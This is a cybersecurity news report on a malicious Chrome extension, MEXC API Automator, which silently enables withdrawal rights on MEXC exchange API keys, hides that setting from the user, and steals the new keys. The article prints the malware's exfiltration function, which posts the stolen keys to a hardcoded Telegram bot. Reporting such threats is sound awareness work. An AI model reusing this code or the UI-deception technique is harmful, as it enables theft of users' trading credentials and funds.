Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons

Social Media

Hackers News Hackers News
  • CyberSecurity News
  • Threats
  • Attacks
  • Vulnerabilities
  • Breaches
  • Comparisons
Search the Site
Popular Searches:
technology Amazon AI
Recent Posts
India Halts WhatsApp Usernames Rollout Due to Fraud Concerns
July 1, 2026
Critical Cursor IDE RCE Vulnerabilities Allow Zero-Click Prompt Injection
July 1, 2026
Automated Password Spray Attacks Target Microsoft Azure CLI
July 1, 2026
Home/Threats/Malicious Chrome Extension Steals Wallet Login Credentials and Enables Automated Trading
Threats

Malicious Chrome Extension Steals Wallet Login Credentials and Enables Automated Trading

The malicious Chrome extension, MEXC API Automator, is exploiting user trust in browser add-ons to steal cryptocurrency trading access from MEXC users. Posed as a tool that helps automate trading and...

Jennifer sherman
Jennifer sherman
January 13, 2026 3 Min Read
31 0

The malicious Chrome extension, MEXC API Automator, is exploiting user trust in browser add-ons to steal cryptocurrency trading access from MEXC users.

Posed as a tool that helps automate trading and API key creation, it quietly takes control of newly created API keys and turns a normal browser session into a full account takeover channel.

The attack starts from a legitimate-looking Chrome Web Store listing that promises “easy API key creation with trading and withdrawal access” for the MEXC exchange.

Once installed, the extension activates when the victim opens MEXC’s API management page, where users normally create keys for bots and automated trading.

From there, it can silently create powerful keys, trigger trades, and enable withdrawals across a global user base.

MEXC interface (Source - Socket.dev)
MEXC interface (Source – Socket.dev)

Besides this, the MEXC interface that targeted users see as normal during this process.

After reviewing the extension, Socket.dev researchers identified it as outright malware and linked it to a threat actor using the handle jorjortan142.

Their analysis showed that the code runs only inside the already logged-in MEXC session, which means traditional password theft is not even needed.

The API automator highlights how the Chrome Web Store branding is used to build trust.

Instead of stealing passwords, the extension focuses on MEXC API keys that allow both trading and withdrawals. These keys often live for a long time, are reused in bots and scripts, and are not watched as closely as interactive logins.

As soon as a fresh key appears in the success popup, the extension grabs it and prepares it for exfiltration to attacker-controlled Telegram infrastructure.

Ai scanner detection (Source - Socket.dev)
Ai scanner detection (Source – Socket.dev)

This report now looks at how the extension infects the browser session, hides dangerous settings, and sends stolen data out in the background. The scanner detection shows Socket AI Scanner flagging this behavior inside the extension code.

Infection Mechanism, UI Deception, and Telegram Exfiltration

MEXC API Automator is a Manifest V3 Chrome extension that injects a single content script, script.js, into the URL pattern ://.mexc.com/user/openapi*.

When the victim opens this page, the script waits for the DOM to load, finds the API creation form, and programmatically selects all permission checkboxes, including withdrawals, without any extra clicks from the user.

To fool the victim, the script then tampers with the page styles so the withdrawal option looks disabled even though it stays enabled on the server side.

It strips the “checked” class from the withdraw checkbox, hides the visual tick mark with injected CSS, and uses a MutationObserver to remove the class again if MEXC’s own code restores it.

The victim thinks only trading is allowed, but the submitted form actually carries full withdrawal rights.

When the exchange shows the success modal with the new Access Key and Secret Key, the script scrapes both values straight from the DOM and sends them to a hardcoded Telegram bot and chat ID in the background.

The core of this behavior appears in a simple function:-

function sendKeysToTelegram(apiKey, secretKey) {
  const botToken = '7534112291:AAF46jJWWo95XsRWkzcPevHW7XNo6cqKG9I';
  const chatId  = '6526634583';
  fetch(`https://api.telegram.org/bot${botToken}/sendMessage`, {
    method: 'POST',
    headers: { 'Content-Type': 'application/json' },
    body: JSON.stringify({ chat_id: chatId, text: `API Key: ${apiKey}nSecret Key: ${secretKey}` })
  });
}

Since the extension stays inside the browser sandbox, reads only page content, and sends data over normal HTTPS, it blends into regular web traffic.

By the time a victim notices strange trades or missing funds, the attacker has already loaded the keys into scripts or tools that can drain accounts without ever touching the user’s password.

Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.

Tags:

AttackMalwareThreat

Share Article

Jennifer sherman

Jennifer sherman

Jennifer is a cybersecurity news reporter covering data breaches, ransomware campaigns, and dark web markets. With a background in incident response, Jennifer provides unique insights into how organizations respond to cyber attacks and the evolving tactics of threat actors. Her reporting has covered major breaches affecting millions of users and has helped organizations understand emerging threats. Jennifer combines technical knowledge with investigative journalism to deliver in-depth coverage of cybersecurity incidents.

Previous Post

One-Click Telegram Flaw Exposes Real IP Addresses, Bypassing Proxies on Android and iOS

Next Post

Multiple Hikvision Vulnerabilities Let Attackers Cause Device Malfunction Using Crafted Packets

No Comment! Be the first one.

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Popular Posts
Critical Fluentd Vulnerabilities Allow Remote Code Execution
July 1, 2026
Weaponized Google Ads Install Malicious Claude Code to Hijack macOS
July 1, 2026
Critical Adobe ColdFusion Vulnerabilities Let Attackers Run Code
July 1, 2026
Top Authors
Marcus Rodriguez
Marcus Rodriguez
Jennifer sherman
Jennifer sherman
Emy Elsamnoudy
Emy Elsamnoudy
Let's Connect
156k
2.25m
285k

Related Posts

Jennifer sherman
By Jennifer sherman
Threats

GlassWorm Attacks macOS via Malicious VS Code…

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Attacks

ClickFix Attack Hides Malicious Code via Stegan Security

January 1, 2026
Sarah simpson
By Sarah simpson
Vulnerabilities

MongoBleed Detector Tool Released to Detect MongoDB Vulnerability(CVE-2025-14847)

January 1, 2026
Emy Elsamnoudy
By Emy Elsamnoudy
Breaches

Conti Ransomware Gang Leaders & Infrastructure Exposed

January 1, 2026
Hackers News Hackers News
  • [email protected]

Quick Links

  • Contact Us
  • Privacy Policy
  • Terms of service

Categories

Attacks
Breaches
Comparisons
CyberSecurity News
Threats
Vulnerabilities

Let's keep in touch

receive fresh updates and breaking cyber news every day and week!

All Rights Reserved by HackersRadar ©2026

Follow Us